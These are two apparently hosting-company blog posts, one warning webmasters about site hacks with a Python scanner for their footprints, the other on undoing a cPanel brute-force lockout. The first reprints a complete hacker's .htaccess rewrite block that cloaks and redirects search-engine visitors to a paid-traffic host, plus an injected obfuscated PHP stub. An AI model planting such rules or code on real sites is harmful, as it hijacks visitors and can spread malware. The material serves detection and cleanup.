Posted on

Hackers Redirecting Websites (.htaccess)

A quick note to fellow webmasters out there, as well as business owners running websites. We have seen a recent rash of brute force hacking attempts on our servers and our clients’ servers. There have been several successful brute force break-ins in the past 3 months. Below are a couple of things to look for and some best practices for keeping your site and your data secure.

Best Practices

The following best practices will help thwart many of the attempts to hack into your account using a brute force “cracker”.

Do Not Share Your Password

Do not share your passwords with anyone. If you have a vendor you need to work with or an employee that needs access, create a specific login for them with its own password.

Do Not Dole Out Access Easily

Before creating a new account with access to your server, first ask yourself whether the person truly needs access. If this is a limited one-time request, consider setting up a generic vendor account that you re-use, and change the password as soon as they are done with it. Never allow more than one person/vendor/client to use the account at a time.

Use A Strong Password

This cannot be emphasized enough. Do NOT use simple passwords. Do not use passwords based on a single dictionary word. DO use passwords with punctuation and capitalization. The most common passwords are “password” and “password1”. Brute force only works if you are using bad passwords.

Try using something like a jumbled phrase with special character replacements; even MyP@ssW0rd! is much better than 90% of the passwords people use. Get creative: “IDon’tLikeMilk!” or “DoYouLikeMilk2?” are fairly easy to remember but hard for brute force bots to guess.

Footprints Left By Hackers

Most hackers have little interest in your data or in doing something directly malicious to your site. The most prevalent reason to hack a site is either to distribute a virus to site visitors or to earn revenue from “pay per click” programs like Google Adsense.

Most often this means adding code to your site while keeping your site functional. It does them no good if the site breaks. They want people visiting your site while a program is downloaded to their browser behind the scenes, or while they are redirected to a site they didn’t intend to visit. Some of the hacks even pop under a browser window with an ad, click the ad, then close the window before you see it, earning the hacker 25 cents in the process.

.htaccess Modification

This is one we’ve seen a few times: the .htaccess file on your server is modified so that a number of specific requests (here, visitors arriving from search engines on Windows browsers, filtered by user agent and marked with an “ADb” cookie so they are only redirected once) are redirected to a site the hacker gets paid to send traffic to.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://kike.therealtruthaboutaging.com/url?sa=t&source=web&cd=15&ved=0vFu49G3C&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMoeqjO6K+yqY2OyVEw8J+1pw==&usg=M4kjonDdK-kwm0WO2JdBFM&sig2=HKhlYtbOgR6MTETnCv3UJQ [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73

index.php / index.htm modification

Here the hacker installs an obfuscated (base64-encoded, compressed) representation of PHP or JavaScript commands into your web page. This runs a program in the visitor’s browser which, depending on the code, can do any number of things, from forcing a program download to adding a tracking cookie to taking over the user’s search bar. Some of these can be very nasty; others are less so and do relatively harmless (but annoying) browser redirection.

  <? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("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")));
#/d93065#
?>
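As an added example (not code from the original post), a small Python scanner for the two footprints described above: a non-negated search-engine RewriteCond on HTTP_REFERER paired with a RewriteRule that redirects off-site, and a gzinflate(base64_decode()) payload wrapped in hash-like marker comments. The host names, hash and base64 blob in the samples are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Footprint 1: a non-negated search-engine RewriteCond on HTTP_REFERER paired with an off-site redirect.
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(?!!)\S*(google|yahoo|bing|msn)", re.I | re.M)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I | re.M)
# Footprint 2: a gzinflate(base64_decode(...)) payload, often wrapped in hash-like markers like '#d93065#'.
OBFUSCATED_CALL = re.compile(r"\b(eval|echo|print|assert)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
MARKER_COMMENT = re.compile(r"^\s*#/?[0-9a-f]{6,}#?\s*$", re.I | re.M)

def scan_htaccess(text, own_host):
    """Flag RewriteRules that send search-engine visitors to a host other than our own."""
    findings = []
    if not REFERER_COND.search(text):
        return findings  # referer cloaking is the tell; ordinary redirects are left alone
    for pattern, target, flags in REWRITE_RULE.findall(text):
        tokens = [t.strip().upper() for t in flags.split(",")] if flags else []
        is_redirect = any(t == "R" or t.startswith("R=") for t in tokens)
        host = urlsplit(target).netloc.lower()
        # targets built from %{HTTP_HOST} (e.g. forcing HTTPS) stay on-site and are not flagged
        if is_redirect and host and "%{" not in host and host != own_host.lower():
            findings.append(f"'{pattern}' redirected off-site to {host}")
    if MARKER_COMMENT.search(text):
        findings.append("hash-like marker comment left after the rewrite block")
    return findings

def scan_php(text):
    """Flag injected, obfuscated PHP of the kind shown in the index.php example above."""
    findings = []
    if OBFUSCATED_CALL.search(text):
        findings.append("gzinflate(base64_decode()) payload is emitted or executed")
    if len(MARKER_COMMENT.findall(text)) >= 2:
        findings.append("injected block wrapped in hash-like marker comments")
    return findings

# Constructed samples modelled on the two footprints (placeholder host, blob and hash; not from a real incident).
HACKED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^(http\\:\\/\\/)?([^\\/\\?]*\\.)?(google\\.|yahoo\\.|bing\\.).*$ [NC]
RewriteRule ^old-page$ https://www.example.com/new-page [R=301,L]
RewriteRule ^(.*)$ http://redirect.attacker.example/url?u=http://%{HTTP_HOST}%{REQUEST_URI} [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
#0123456789abcdef0123456789abcdef
"""
CLEAN_HTACCESS = "RewriteEngine On\nRewriteCond %{HTTPS} off\nRewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]\n"
HACKED_INDEX = '<?php require("the_real_header.php");\n#d93065#\necho(gzinflate(base64_decode("QUJDREVG")));\n#/d93065#\n?>\n'

if __name__ == "__main__":
    print(scan_htaccess(HACKED_HTACCESS, "www.example.com"))  # off-site redirect + marker comment
    print(scan_htaccess(CLEAN_HTACCESS, "www.example.com"))   # []
    print(scan_php(HACKED_INDEX))                             # payload + marker comments
```

Run it over the real files with the site’s own hostname (for example, `scan_htaccess(open(".htaccess").read(), "www.yoursite.com")`); a legitimate HTTPS or www redirect to your own host produces no finding.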

Summary

We hope that by getting this information online people start to learn a bit more about site security. Insecure sites not only slow down the browser and are a detriment to the overall user experience, they can have much larger, far-reaching effects that people don’t even think of. One of the larger terrorist groups was found to be partly funded by Internet hacks like these. 25-cents-at-a-time clicks added up to over $1M that went straight into the terrorist network. Now that’s a lot of clicks! Imagine if they used this for a good cause… donate food or shelter to people in need, but that is a story for another site.

In the meantime, secure your site, remove the hacks, and create a better experience for your visitors.

 

Posted on

cPanel Brute Force Protection – regaining access

cPanel comes with a great feature called brute force protection. The problem is, if you mis-type your password 5x in a row, or if you have multiple people in the office, like we do, who try to get into various services and together rack up 5 missed passwords in a row (SSH, mail, and WHM logins all qualify), then you will lock yourself out of your system. Here are some tips & tricks that will help you regain access.

Gaining Initial Access

The easiest and quite possibly ONLY way to get back into your system is by logging in from a different IP address. Sometimes you can do this by re-initializing your modem/router if you are on a DHCP-assigned address from your ISP. This is usually the case for residential service from DSL companies like AT&T (no other choices, huh? we feel sorry for you), Comcast, or Roadrunner. If you are on a business class line and have static IP addresses assigned, then your public-facing IP won’t change. You can try to do a One-To-One NAT to give yourself a different static IP, but that assumes you have more than one and that one of them is not being used. You can try tethering your phone, assuming you have a smart phone. You can also try to hop on a neighbor’s open WiFi network if you have wireless. You can also drag your laptop to the local Starbucks and try from there. If you are wired you have far fewer choices: either call your IPP (hosting company) and ask them to reset brute force protection, OR call your ISP and have them assign you a new static IP (if you have only one, chances are you don’t have servers mapped to it).

To summarize: get on a different network!

  • Try resetting your modem/router if you are on a DHCP address from your ISP.
  • Assign your PC a different static IP if you have a static IP group.
  • Tether your phone.
  • Jump on the neighbor’s network (ask first).
  • Bring your laptop to a public WiFi hot spot.
  • Call your ISP for a new IP.
  • Call your IPP and ask them to reset cPanel brute force.

Cleaning Out Specific Blocked Entries

If you can gain SSH access you can clean out the errant entries in the cphulkd database that drives brute force protection, entering your IP address in the where clause to find and remove your blocked IP:

# mysql
mysql> use cphulkd;
mysql> select * from brutes where ip LIKE '%<your-ip-or-start-of-ip-address>%';
(check the returned list to make sure what you think is your blocked IP is actually on the list)
mysql> delete from brutes where ip LIKE '%<your-ip-or-start-of-ip-address>%';
mysql> quit

Restarting cpHulkd

After making any changes make sure you restart cpHulkd:

# /usr/local/cpanel/etc/init/stopcphulkd
# /usr/local/cpanel/etc/init/startcphulkd

Cleaning Out ALL Blocked Entries

This will reset the “good guys” and the “bad guys”, but if you need a quick fix, don’t want to disable brute force protection, and aren’t comfortable with MySQL command line then go to the  brute force protection interface in cPanel and click the “flush db” button.

Make Sure You Don’t Get Blocked Again

Log in to cPanel and go to the brute force protection interface. Look for the trusted IP list link. Add your IPs to that list.

Also Running APF?

You will need to stop the apf process from running:

# service apf stop

Then add your good IPs to the whitelist:

# vi /etc/apf/allow_hosts.rules